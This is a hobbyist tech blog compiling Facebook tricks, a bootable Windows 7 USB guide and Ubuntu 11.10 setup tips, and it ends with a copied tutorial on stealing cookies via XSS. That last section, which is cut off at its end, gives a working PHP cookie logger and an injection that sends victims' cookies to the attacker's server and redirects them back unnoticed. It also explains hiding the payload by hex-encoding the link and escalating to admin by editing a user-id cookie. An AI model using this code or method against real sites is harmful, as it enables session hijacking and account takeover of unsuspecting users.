Facebook TRickzzz

   It was my last semester exams going  on and I couldnot update my blog...First of all sorry to all those few but dedicated readers of ma blog.. I recently conducted a search in internet about various hidden tricks about facebook and I would like to share it with U..
   

    Almost more 50% percent of the internet users in our country will surely have an account in the world's one of the most popular social networking site facebook.com.. Even many of us will be using INternet only for surfing in Facebook... Actually I have found  many of my friends activate GPRS plans in their mobile just to make them always updated in facebook.. Thats the reason why I write this post... This post is dedicated to all those my loving facebook addict friends...

ACCESSING UR FACEBOOK ACCOUNT WITH 3 DIFFERENT PASSWORDS

Are U wondered hearing U can access facebook using 3 different passwords.. ok..Let me explain it using  a simple example... If my original facebook password is "leThalTrix" (without quotes),then I can also use the following methods to access my account

1.Case letters Toggled

                        In my Original password letters T are capital and all other are lower case..If I just inverted this ..i.e all upper case to lowercase and vice versa, then also I can access my account ... that is "LEtHALtRIX" also helps me to access my account.. This is not a bug or an error in facebook.his is just an option provided by Facebook itself to make the sign-in process easier for the users. Here’s how:

The most common reason for the authentic logins to be rejected is when the CAPS LOCK is ON. This is where this option comes in handy. That means, when the CAPS LOCK is ON the case gets reversed (toggled) for your password but Facebook will accept this as well.

2.Password with first letter Capitalised

        This method will only work in mobile. That is ur password varient with first letter capitalised will also work.. That is "LeThalTrix" also help to access... This is because in most of all mobile users it is a common for the first letter of the password to get capitalized which often leads to the login failure. So, in order to tackle this issue, Facebook will also accept the password where only the first letter is capitalized.

HIDE YOUR ONLINE STATUS ON FACEBOOK CHAT FROM SELECTED CONTACTS

 Sometimes You may have already noticed this option. U can select who all in your friendlist can see or cannot see you online.. This option has made the life easier to hide from your boss and chat with your girlfriend ;) .

   For this click on the small gear like icon (settings) on the chat bar.. Select advanced settings and U can see the options to who all want to be online or to who all You want to be hidden... 

     You can also be hidden to a particular user or online to that user by clicking on the gear like icon on the individual chat window... Isnt it wonderful!!!

UPDATE YOUR FACEBOOK ACCOUNT FROM THE DEVICE U WISH

You might have seen some feeds on Facebook in which it will be displayed below update from some friend as “Updated via iPhone” or “Updated via Blackberry” etc. This is because, when ever someone update their Facebook profile status from some featured devices like iPhone, Android, Blackberry, A line will be added below their update on feeds which display from which device the update was made.

But here is a trick from which you can update from any device of your choice without even having any device.

i.e. You can update your Facebook profile status via iPhone 5 even without having it anyway iPhone 5 is not yet launched by apple. But you can update via iPhone 5.

Update your status via following devices. Log in to Facebook and open any of these links to update via respective devices.
Via iPhone 5
Via iPhone 4
Via iPhone
Via iPad 3
Via iPad 2
Via Blackberry
Via Blackberry Touch
Via Blackberry Playbook
Via Calculator

Now go and show off before ur facebook friends :)

How to Install Windows 7 using pendrive

Now everyone has a USB stick with them and it is more convenient to take a USB stick than a DVD along with you and almost all new motherboards support bootingfrom USB sticks. Not only that if your CDROM got complaint, the only way to install new Operating System is through USB.. Ubuntu or all other linux versions provide the facility to install it through USB Stick usick using applications such as startup disk creator or Unetbootin.. Also overall installation speed also increases when doing with USB Stick... So in this post , I thought to share the method to load windows 7 to your USB Stick and make it bootable..

You will require a USB stick with capacity not less than 4GB and a WINDOWS 7 DVD.

STEP 1 

Plug your USB and format it after backing up your data.

STEP 2

Open the command prompt. If you are using Windows 7/Vista then open it with administrator rights*.

* Goto Start -> All Programs -> Accessories -> Right-click on “Command Prompt” and select “Run as Administrator”.

STEP 3

In the command prompt type

diskpart

This will start Microsoft Diskpart utility as shown

   STEP 4

Now type

LIST DISK

This will list all the disks in your system... In that select the disk that shows your USB stick..In the above figure it is DISK 5..Usually DISK 0 shows your Hard Disk..

STEP 5

Inorder to select disk type (Replace #with the respective Disk number)

SELECT DISK #

STEP 6

Now type the following commands in sequence

CLEAN

CREATE PARTITION PRIMARY

SELECT PARTITION 1

ACTIVE

FORMAT FS=NTFS QUICK

ASSIGN

EXIT

Now minimize the command prompt and

STEP 6

Insert the Windows 7 installation disc and note down the “drive letter” of your DVD drive. In my case, it is “H:”. Now type the following list of commands as shown below:

H: CD BOOT

CD BOOT

BOOTSECT.EXE /NT60 M:(NOTE: M: is your USB drive letter)

EXIT

STEP 7

Copy the contents of your Windows 7/Vista installation disk into the USB flash drive.

That’s it! Your USB stick is now ready to boot and install the OS for you. Don’t forget to enable the “USB Boot” option and change the “boot priority to USB device from hard disk” in your BIOS settings.

NOTE : Recently came to know about a software that will help us to make windows 7 bootable pendrive.... You can download it here....  

How to change GRUB settings in Ubuntu

I am really happy to introduce a fanpage of LETHALTRIX in facebook. I recommend all of you to follow LethalTrix in facebook, so that u will be updated about the new posts. Also this fanpage is made to make Lethaltrix more Interactive. You can post any of your doubts about Ubuntu ,Hacking or Computer Tips and I will try my level best to help you and post about in LethalTrix... 

 So this post is dedicated to our friend Renitto who inaugurated the fanpage by asking about Grub..Thank u dude for the response u have shown..
 
Actually GRUB is the short form for GRand Unified Bootloader.It is a boot loader package from the GNU project. GRUB  provides the user the choice to boot one of multiple operating systems installed on a computer.

 Grub Customizer is a great software used in Ubuntu or other Debian versions of Linux such as Linuxmint to make changes to grub.You can change the appearance of the GRUB, make changes to the boot list, add, rename or delete a new entry, insert background image, change colour and so on...

Inorder to install Grub customizer you have 3 ways.

INSTALLATION USING TERMINAL
U can access Terminal by pressing the short key Alt+Ctrl+ T. Now type the following commands in order.

Code:

sudo add-apt-repository ppa:danielrichter2007/grub-customizer
sudo apt-get update
sudo apt-get install grub-customizer

I prefer this method as it is the fastest method to install. But if you hate terminal view  and if you feel it geeky ,you can go for the other options.

INSTALLATION USING SOFTWARE MANAGER

Open Software centre

• Add the repository
  Edit > Software Sources > Other Software > Add
  Type: ppa:danielrichter2007/grub-customizer > Add Source > Close
  Reload
• Install Grub Customizer
  Highlight "Get Software" in the left panel.
  In the upper right search window, type "Grub Customizer".
  Double-click "Grub Customizer" and click the 'Install' icon.

INSTALLATION USING SYNAPTIC

Synaptic:

• Start Synaptic
  System > Administration > Synaptic Package Manager (IN UBUNTU 10.10 & earlier versions)
• Add the repository
  Settings tab > Repositories > Other Software > Add
  Type: ppa:danielrichter2007/grub-customizer > Add Source > Close
  Reload
• Install Grub Customizer
  'Quick-search' > type "grub-customizer" > Select "grub-customizer" in lower panel.
  Apply.

4. Making Changes (from Main Page)

• Removing / Hiding Entries
  • Hide An Entire Section: Untick the main header (linux, os-prober, etc)
    • Example: Unticking os-prober will disable the script and remove all entries normally found by it - Windows, other Ubuntu installations, etc. Even if the entries within the subsection are enabled, they will not be displayed.
    • Hide Specific Entries: Untick the entry
      • Example: Unticking Ubuntu, with 2.6.35-24-generic will remove that specific entry in the Grub 2 menu.
• Freezing Entries (new Entries)
  • Unticking "new Entries" prevents the addition of any new Grub 2 menu entries for that section. New options found during updates may be included in the tree view but will not be selected by default.
    • If a new item is found by an enabled script, it will not be added to the Grub 2 menu.
  • Example: If 'new Entries' in 'linux' is deselected, when a new kernel is installed on the main system it will not appear in the menu.
• Adding Entries
  • Tick the applicable entry.
  • Selecting a main category will enable the script.
  • Selecting an item within a main category will add it to the Grub 2 menu if it's parent is enabled.
• Renaming Entries
  • Double-click a menu title to enable the editing mode. Type the new title and click elsewhere on the page to complete the edit.
• Moving Entries
  • To move a main section, highlight the entry and use the Up/Dn arrows on the main menu to change the menu order. Moving a main category will move all its submenus.
    • Example: If you want Windows to appear before the main Ubuntu entries, move os-prober to the top of the list.
  • To move a title up or down within a subsection, highlight the entry and use the Up/Dn arrows on the main menu to change the menu order.
    • A titles can only be moved within its own subsection.

5. Preferences Tabs (Edit > Preferences)

• General
  
  Initial display options such as whether the menu is shown, which menu entry is highlighted, and what kernel options to add to the instructions.
  • Default entry
    • How to Specify the Default Entry by Name:
      • 'default entry' > 'predefined': Click on "Entry 1", on the expanded selection screen choose the exact title from the right column.
      • This works for Grub 1.98. Grub 1.99/Natty introduces submenus and using exact titles will change. I don't know if GC has accounted for this change yet. In the meantime, you can refer to this link on how to manually add a default entry from a submenu:
  • visibility - Menu display, other OS selections, and timeout.
  • kernel parameters - Add options such as nomodeset, noapic, quiet, splash, etc
• Appearance
  
                           
  
        
  Menu eye candy - resolutions, colors, background images.
  • custom resolution
  • menu colors
  • background image
• Advanced
  
  Selection of options normally found in the /etc/default/grub file. The user can enable/disable individual items and can modify the existing entries by double-clicking the 'value' column and entering the desired value.
  
  
  • The only items listed in this section are those which currently exist in /etc/default/grub. The user can enable items displayed here, but cannot add items which do not already exist in the file.
  • Ticked items are included in the Grub 2 configuration file.
  • Unticked items will not be included in the Grub 2 configuration file. Unticking an entry places a # (comment) symbol at the start of the line in /etc/default/grub

   Returning to Grub 2 Defaults

 Original files which Grub Customizer will modify are moved to the /etc/grub.d/proxifiedScripts folder, with the leading numeric designation removed.

The /etc/grub.d/proxifiedScripts and /etc/grub.d/bin folders, and any *_proxy files are only created if a Grub 2 script has to be modified. If only changes normally made to /etc/default/grub are invoked by Grub Customizer, the following won't be necessary.

To restore the normal Grub 2 control of the boot menu:

• Remove the /etc/grub.d/bin folder
• Move the contents of /etc/grub.d/proxifiedScritps back to the /etc/grub.d folder.
  • Any files moved back need to be renamed to the original name.
  • linux back to 10_linux, os-prober back to 30_os-prober, etc.
• Remove the /etc/grub.d/proxifiedScipts folder once it is empty.
• Check the settings in /etc/default/grub and make any desired changes (default kernel, timeout, etc).
• Run "sudo update-grub".

This software is a wonderful tool to edit Grub... If you want more good themes and beautiful themes for your GRUB ,I suggest you go with Burg, an alternative for GRUB...

 

WELCOME UBUNTU 11.10 "ONERIC OCELOT'

Hai friends... I was not in touch with this blog for last few weeks since my university exams were going on... Lots of interesting things have happened on this small  duration and one of the most important in this is the release of Ubuntu 11.10 the  'Oneric Ocelot'.
I have been using Oneric from their 2nd alpha release and found many things superb in this release...
  One of the greatest change we first notice while going with ubuntu 11.10 is its new look for the login screen.(LightDM is the new login screen while the old one is GDM).. I loved the new look and made my first impression the best ... Congrats for Ubuntu for that.I hope most of the users have the same experience. :)

 The next thing we will notice in new ubuntu is that it doesnot have Ubuntu classic, instead it provides unity 2D interface. As my laptop is old , Ubuntu unity is little lagging hence I went on with unity 2D and I am surprised that its also cool as Unity.. Wow!!.

  So what are the things I have done done after Installing Ubuntu 11.10 in my computer.Thats what I would like share through this post.. Thanks to Techdrivein.com for an explained list of what all we have to do.. First of all we have to update the repositories and make sure all the updates are installed... Otherwise many of the interesting features in Ubuntu wont work.

UPDATE REPOSITORY

For that type update manager in unity dash and select it. click check and install all the updates.. Done (We can also do this alternatively by typing the following command in terminal which can be accessed using the shortcut key Alt+ctrl+T. 

sudo apt-get update && sudo apt-get upgrade

 

UBUNTU RESTRICTED PACKAGES  

After that Install Ubuntu -Restricted packages. Otherwise You wont be able to listen to music or watch movies.. One method is to click a mp3 or videofile and Ubuntu will show the missing packages and just update it from it. Now the other more efficient way is to go to terminal and type

sudo apt-get install ubuntu-restricted-extras 

Or if you dont like command interface (if it feels like geeky) dont worry...Ubuntu provides you an alternate way. take synaptic package manager (search in unity dash) and type ubuntu-restricted-extras, click on the box on the left side and click mark for installation and apply from the top panel.. Done

Enable Full DVD Playback(Dual Layer DVD Support)

Installing Ubuntu -Restricted packages package will pull in support for MP3 playback and decoding,support for various other audio formats (GStreamer plugins), Microsoft fonts,Java runtime environment, Flash plugin, LAME (to create compressed audio
files), and DVD playback.But this does not install libdvdcss2, and will not let you play
encrypted DVDs such as Dual Layer DVDs.

 sudo wget --output-document=/etc/apt/sources.list.d/medibuntu.list http://www.medibuntu.org/sources.list.d/$(lsb_release -cs).list && sudo apt-get --quiet update && sudo apt-get --yes --quiet --allow-unauthenticated install medibuntu-keyring && sudo apt-get --quiet update
sudo apt-get install libdvdcss2

 You can also install this using Synaptic package manager. But U have to update your source list. For that take settings -> Repositories-> other software. But i prefer you use the Terminal method which is more easy.. Sometimes Geeky methods are more easier than that of grapphical interface.

Check for Availability of Proprietary Hardware Drivers
 Now you have to download the drivers for the graphic card, wireless LAN , bluetooth etc on the system...Most properly drivers for this will be available in Additional Drivers which can be accessed from unity dash board.. Update all the drivers in the list.. Sometimes drivers for your system  may not be available in Additional Drivers. In such cases I am sorry to inform that you have to swim deeply inside ubuntuforums which almost solve any problems related to ubuntu...

(image from techdrive.in)

  Install Compiz Config Settings Manager

Compiz brings the beautification effects for your desktop and is a very good tool to surprise your friends who are new to Ubuntu.. This compiz package has helped me to make my friends use  Linux...If you never used Compiz, its better you try out its magic..
To install this, just search compiz config manager in Ubuntu software centre..
Also install all compiz plugin extra and compiz fusion plugin extra packages using synaptic package manager. You can also install Coompiz config settings manager using terminal by

sudo apt-get install compizconfig-settings-manager

You can get compiz config settings manager by seaching CCSM in unity dashboard.Just experiment on it.

•        You can increase/decrease the size of launcher icons in the unity plugin-> experimental tab in ccsm
• you can also change the transparency of unity panel in unity plugin-> experimental
• You can increase the number of dektops by general options-> desktop size in ccsm
•   You can give animations to opening and closing windows, menus, popup menus etc from animations under effects in ccsm

Also try the water effect, wobly effect.. i effects menu.

Add Your Favorite Places as Quicklists for Home Icon in Unity

• Copy 'Home Folder' launcher file to your home directory. For that, you need to open Terminal(Unity Shortcut: Ctrl + Alt + T) and copy-paste the following commands.

cp /usr/share/applications/nautilus-home.desktop ~/.local/share/applications

• Open the file in your favorite text editor. I am using vi editor here.

sudo vi  ~/.local/share/applications/nautilus-home.desktop

• Now replace the content of the file with the following text.

[Desktop Entry]

Name=Home Folder
Comment=Open your personal folder
TryExec=nautilus
Exec=nautilus --no-desktop
Icon=user-home
Terminal=false
StartupNotify=true
Type=Application
Categories=GNOME;GTK;Core;
OnlyShowIn=GNOME;Unity;
X-GNOME-Bugzilla-Bugzilla=GNOME
X-GNOME-Bugzilla-Product=nautilus
X-GNOME-Bugzilla-Component=general
X-Ubuntu-Gettext-Domain=nautilus

X-Ayatana-Desktop-Shortcuts=Videos;Documents;Music;Pictures;Downloads
[Videos Shortcut Group]
Name=Videos
Exec=nautilus Videos
TargetEnvironment=Unity


[Documents Shortcut Group]
Name=Documents
Exec=nautilus Documents
TargetEnvironment=Unity

[Music Shortcut Group]
Name=Music
Exec=nautilus Music
TargetEnvironment=Unity

[Pictures Shortcut Group]
Name=Pictures
Exec=nautilus Pictures
TargetEnvironment=Unity

[Downloads Shortcut Group]
Name=Downloads
Exec=nautilus Downloads
TargetEnvironment=Unity

• And restart Unity. Hit Alt + F2 and run the following command to restart Unity.

unity --replace

• Done. If that doesn't work, you might need to log out and log back in to restart Unity. 

Enable Unity Grab Handles

Unity grab handles are a easy and eyecandy way of resizing windows, better suited for touch screen devices though.

• Launch CCSM(just search for CCSM in Unity Dash).

• Make sure that the category Png(highlighted above) is ticked.

• In the Uncategorized section at the bottom of CCSM, make sure that Unity MT Grab Handles is ticked as well. Click on Unity MT Grab Handles option now.

• You will see that the Toggle Handles option is Disabled by default. Click on the Disabled button and tick the resulting Enabled box.

• Hit Grab key combination button and select the shortcut you want. As you can see in the screenshot above, Control + Alt + g was my choice. Its up to you.

• Done. Unity Grab Handles are enabled in Ubuntu 11.10 successfully.

SYSAPPLICATIONS ON THE UNITY TOP PANEL


U would have noticed that Unity Top panel is locked down so that U cant add any more applications in that..

• weather application

type the following in the terminal

sudo apt-get install indicator-weather

• Dropbox application Indicator

how to install : http://www.techdrivein.com/2010/09/how-to-install-dropbox-in-ubuntu-lucid.html

• Sysmonitor Indicator

 Paste the following in Terminal

sudo add-apt-repository ppa:alexeftimie/ppa
sudo apt-get update
sudo apt-get install indicator-sysmonitor

• System Load Indicator

Do the following in Terminal to install System Load Indicator

sudo add-apt-repository ppa:indicator-multiload/stable-daily
sudo apt-get update
sudo apt-get install indicator-multiload

Done. And simply launch System Load Indicator from Unity dash. Eventhough System Load Indicator app is equally good, I prefer Sysmonitor Indicator for its simplicity.

• Touchpad Indicator

sudo add-apt-repository ppa:atareao/atareao
sudo apt-get update
sudo apt-get install touchpad-indicator

Done. Now, once you disable your touchpad, you can access top panel by simply hitting F10 key.

• Work Space indicator

sudo add-apt-repository ppa:geod/ppa-geod
sudo apt-get update
sudo apt-get install indicator-workspaces

• Keylock Application Indicator

sudo add-apt-repository ppa:tsbarnes/indicator-keylock
sudo apt-get update
sudo apt-get install indicator-keylock

• Caffeine Application Indicator

Caffeine is a very useful application application that can temporarily prevent the activation of both the screensaver and the "sleep" powersaving mode. There is even an option to activate Caffeine when specific applications are launched. Do the following in Terminal to install Caffeine in Ubuntu 11.04.

sudo add-apt-repository ppa:caffeine-developers/ppa
sudo apt-get update
sudo apt-get install caffeine

Done. Simply launch Caffeine from Unity dash.

 

•  Pastie Clipboard Manager Indicator

Pastie is a simple clipboard manager. Do the following in Terminal to install Pasite indicator in Ubuntu 11.04 Natty Narwhal.

sudo add-apt-repository ppa:hel-sheep/pastie
sudo apt-get update
sudo apt-get install pastie

Done. Launch Pastie clipboard manager from Unity applications dash.

 Install GNOME Shell in Ubuntu

Just search for 'GNOME Shell' in Software Center OR do the following in Terminal.

sudo apt-get install gnome-shell

• Done. So if you like GNOME Shell and intends to use it more often, here are some stunning GNOME Shell themes you should not miss. 

Important thing to note when switching from WINDOWS to UBUNTU..

Recently UBUNTU has gained much popularity among college students and others than the past... Many are willing to try UBUNTU who had been get used to with WINDOWS. Actually I am such a person, and took some time to get tuned with UBUNTU... So this post is for all migrators to UBUNTU from WINDOWS .
    Just keep in mind some things and U will find Ubuntu lot more interesting..

.EXE Files in windows and packages in UBUNTU
                   Windows software comes in .exe files, which you are expected to get from the web or from a store. Ubuntu software comes in packages, which are installed and updated through a centralised system, like a more powerful version of Windows Update and Add/Remove Programs. Application packages will usually appear in the Applicationsmenu, configuration tools will usually appear in the Preferences orAdministration menu.In the same way that Windows only runs software designed for Windows, applications must be made for Linux to be able to run on Ubuntu. Most Linux software is available for free over the Internet.

Firewalls and antivirus software

Ubuntu's main firewall program is called ufw (click here to install gufw). There are currently very few Linux viruses in the wild, so Ubuntu doesn't come with antivirus software installed.

The Terminal

Linux includes a text-based interface like cmd.exe, called the terminal. Many Linux guides ask you to run commands in the terminal, which should be available from Applications > Accessories > Terminal. 

Task Manager

Ubuntu's System Monitor is the closest equivalent to the Task Manager in Windows. It's available through System > Administration > System Monitor.

Where To Put Your Files

Linux doesn't use drive letters, so there's no C: drive and no D: drive. You'll get used to Linux's filesystem gradually, but for now here are the most important locations:

/home/

This is your home folder, which is fairly similar to My Documents in Windows. You can access this folder by clicking Places> Home Folder. Because this folder is used so often, many programs refer to it as "$HOME" or "~" ("tilde", pronounced "till-der". For example, saving a file as ~/my-file.txt is the same as saving it as /home//my-file.txt

/home

This is folder contains everybody's home folders, and is fairly similar to Documents and Settings in Windows. The main thing to remember is that despite the name, this is not your home folder. If somebody tells you to go to your home folder, they mean /home/.

/media

This folder contains CD-ROMs, memory sticks, and other removable media. Individual drives will also appear in the Places menu item and on your desktop.

/tmp

This folder contains temporary files, and is cleaned out when you reboot.

Safely removing drives

When you are finished with a removable drive, right click on the drive's desktop icon and select Unmount volume or Eject, depending on what type of drive it is.

Dual-Boot

When you are looking to switch to Ubuntu one option that may make the transition a little easier is setting up a dual-boot. In a dual-boot, during the boot process, a menu will appear, allowing you to choose from one of two OS's. This allows you to try out Ubuntu while keeping your Windows installation.

Traditional

In a traditional dual-boot Windows will be installed along side of Ubuntu each having it's own partition. If Windows is already installed, this option does pose some risk. To enable each OS to have it's own partition you will need to edit the partition which has the risk of data loss.

Wubi

If you are not ready for this, another option would be Wubi. Wubi is a special installation that will install Ubuntu within Windows similar to any other program. When installing Wubi, you specify how much of the hard drive to devote to Wubi. Not changing the partitions removes the risk of data loss.

                                                                                        SOURCE : www.help.ubuntu.com 

COOKIE STEALING USING XSS

 Recently a post may have came into ur facebook wall saying u have been tagged in some video..And when you click that video, it will show a play button and then ask u to press ctrl + v on address bar... Actually it is cookie stealing... If you have done that your cookies has been stolen and now they can access your account even if you  changed your password...
    This attack has been seen on orkut asking a javascript to paste in URL box and you will get new themes...Actually all these are varieties of the same hacking method cookie stealing with XSS. So in this post i would like to give you a brief explanation on cookie stealing and how you can do it.. Actually this is not intended to use to hack other's account but to save your account from future attacks and secure your websites if you have any.....

i know reading big theories are boring.... but this article may help u.......

**(edited from http://www.go4expert.com/forums/showthread.php?t=16641)

What are cookies and how are they used by websites and web admins?

Cookies identify you to the site. They store settings about your customized look and feel for the pages you view, your username and encrypted password or user id, who referred you to the site, profile preferences, and just about any kind of information the admins want them to store to customize your user experience. Cookies are most commonly used to give you access to login protected pages once you've entered your information, identify you in content that you change on the site (forum posts or article comments, for example), tell the administrators how you found the site, and more. Again, cookies will function as their creators have written them to function. This sounds like a simple, obvious statement, but it can't be overlooked. We'll see why later.

So what are the effects if cookies are manipulated?

Insecure cookies can be changed to allow you access to protected pages (ex admin), change your user id to impersonate other users, etc. Up until now, this tutorial has been all theoretical information, so how about a little real-life application now?

One of the website I know worked like this: the user would log in and the site would check the username and password combination. If they were correct, then the site would give the user a cookie containing their user id (ex: 1428) to identify them to the site for the remainder of their session, their username to be displayed on the content they changed (ex: fourthdimension), and some other miscellaneous info like local time, referrer, etc. Like I mentioned earlier, sites will only use cookies as well as their administrator created them to. Are you beginning to see what could happen if administrators use cookies insecurely like this one did? If not, you will in a few minutes. The minute I saw my cookie and understood how the site used it, I knew the site can be hacked. The first thing I did was fool around with changing the value of my username. Sure enough, when I posted comments on the site, the comment author fields displayed whatever I had just changed my cookie's username value to. Well, that was fun, but not very useful unless I wanted to use it for phishing or social engineering, none of which were objectives in this test, so I decided to take note of it in my report and move on. What about the user id field? Like I said, the site would check for a valid username/pass combo ONCE, when the user logged in. After that, it relied on the cookie to tell it who the user was. That made the user id field a pretty promising field to change if I want to escalate my privileges on the site or control other users' accounts. Sure enough, as I changed the user id, I would change who I was logged in as. (Note that the display name didn't change because that was stored seperately as I mentioned earlier, but all the user info and preferences, etc changed, so I was sure that it worked.) Working on the assumption that the user id wasn't a randomly generated number but actually the member number assigned by the order of registration, I decided to try for the admin's account, which would have the user id of 1 or 0001 or something along those lines. After a few minutes of tweaking that logic, I was logged in as the site administrator. So now do you see how powerful changing your cookie can be if site administrators don't user secure cookies or use their cookies securely? I didn't even need to know the admin's username or password, and since there were no visible attacks on the site, there was nothing to raise anyone's suspiscion. Cookies can be usefull tools when used correctly by web admins, but powerfull attack vectors to be exploited when used incorrectly.

So now that you understand the theory and applications of cookies, you're probably wondering how you can edit them on your own. There are many ways to change cookies, such as javascript injections, dozens of firefox addons, etc. My favorite way is by using a firefox addon called Firecookie, which is actually an extension to another firefox addon, firebug. You can download them from mozilla's official addon site (firebug must be installed first):

Firebug: https://addons.mozilla.org/en-US/firefox/addon/1843
Firecookie: https://addons.mozilla.org/en-US/firefox/addon/6683

If you don't have firefox, get firefox. Now that you have them installed, I'll give you a quick guide to editing cookies with them. There's a lot more you can do with firebug, so I'd encourage you to look at some tutorials for its other features as well, like editing pages' source code on the fly with its Inspect feature. That aside, back to editing cookies. Click the firebug icon on the bottom right of your firefox window. Now click on the Cookies tab at the top of the window that pulls up. Fill in the checkbox for Cookies and click apply. Click OK on any windows that pop up about resending data. Now you should see a listing of the cookie field and values, among other things. Right click on the field you want to change and click edit. Change the value field to whatever you want. You may need to change the session only check box or the expiration date to get the cookie to stay once the page has refreshed, depending on the page. Once you've changed the value, refresh the page. If you still see your cookie in the firecookie window, then your cookie is in effect. If not, you may need to play with some of the settings as I mentioned earlier.

What is Cross Site Scripting?

---

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Cross-site scripting holes in general can be seen as vulnerabilities which allow attackers to bypass security mechanisms. By finding clever ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other objects.

There are three distinct types of XSS vulnerabilities:
non-persistent
persistent
and DOM-based (which can be either persistent or non-persistent).

Non-persistent cross-site scripting hole is also referred to as a reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If any occurrence of the search terms is not HTML entity encoded, an XSS hole will result.

Persistent XSS vulnerability is also referred to as a stored or second-order vulnerability, and it allows the most powerful kinds of attacks. A type 2 XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, file system, or other location), and later displayed to users in a web page without being encoded using HTML entities. A classic example of this is with online message boards, where users are allowed to post.

DOM-based XSS vulnerability, also referred to as local cross-site scripting, is based on the standard object model for representing HTML or XML called the Document Object Model or DOM for short. With DOM-based cross-site scripting vulnerabilities, the problem exists within a page's client-side script itself. For instance, if a piece of JavaScript accesses a URL request parameter and uses this information to write some HTML to its own page, and this information is not encoded using HTML entities, an XSS hole will likely be present, since this written data will be re-interpreted by browsers as HTML which could include additional client-side scripts.

**************************************************

  theory part over... now practical part

HOW U CAN STEAL COOKIE USING XSS

(NOTE: Again... this was written to educate you on the security aspects of the following information, not to teach you how to break the law or do something stupid. Use what you learn from this to make your website more secure/use better browsing habits, not break into other websites.)

Now we need to understand a bit more about how XSS actually works before moving on. From above, you already know a bit of the theory behind XSS, so we'll get right to the code. Let's say a web page has a search function that uses this code:

<tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr>

We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:

Code:


<script>alert("test")</script>

When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:

Code:



<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>

Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:

Code:



"><script>alert("test")</script>

This should close the quotes end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed. Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example,

Code:


http://www.site.com/search.php?q="><script>alert("test")</script>

Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here:

Code:
http://centricle.com/tools/ascii-hex/

Hexing the query of this url gives us

Code:


http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2 f%73%63%72%69%70%74%3e

The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.

Using XSS to Steal Cookies

OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?

The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):

Code:





<?php 


function GetIP() 
{ 
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
$ip = getenv("HTTP_CLIENT_IP"); 
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
$ip = getenv("HTTP_X_FORWARDED_FOR"); 
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
$ip = getenv("REMOTE_ADDR"); 
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 
$ip = $_SERVER['REMOTE_ADDR']; 
else 
$ip = "unknown"; 
return($ip); 
} 


function logData() 
{ 
$ipLog="log.txt"; 
$cookie = $_SERVER['QUERY_STRING']; 
$register_globals = (bool) ini_get('register_gobals'); 
if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
else $ip = GetIP(); 


$rem_port = $_SERVER['REMOTE_PORT']; 
$user_agent = $_SERVER['HTTP_USER_AGENT']; 
$rqst_method = $_SERVER['METHOD']; 
$rem_host = $_SERVER['REMOTE_HOST']; 
$referer = $_SERVER['HTTP_REFERER']; 
$date=date ("l dS of F Y h:i:s A"); 
$log=fopen("$ipLog", "a+"); 


if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>"); 
else 
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n"); 
fclose($log); 
} 


logData(); 


?>

This script will record the cookies of every user that views it.

Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:

Code:



"><script language= "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>

yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:

Code:



